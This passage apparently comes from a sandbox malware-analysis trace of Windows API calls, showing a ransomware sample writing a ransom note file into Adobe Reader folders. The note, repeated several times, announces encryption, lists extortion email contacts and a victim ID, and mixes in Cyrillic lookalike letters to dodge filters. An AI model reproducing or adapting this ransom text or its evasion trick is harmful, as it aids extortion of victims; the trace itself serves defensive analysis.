n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\nr\x16ÂnQ@¹\x7ftÓ|8¯\nË~¹üi¹¡®J\x04bi2ÆÈ(#ì×ëÊ®]`'­u\x900\x18Z\x88äsÃÍá±K6l²Ê\x98dj_\x15þ,÷s¾", lpUsedDefaultChar=0x0) returned 7247 [0065.129] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ea7288*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1ea7288*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0065.131] CloseHandle (hObject=0x1e8) returned 1 [0065.131] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\bg85_info.rtf")) returned 0xffffffff [0065.131] GetLastError () returned 0x2 [0065.131] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.450] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.473] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 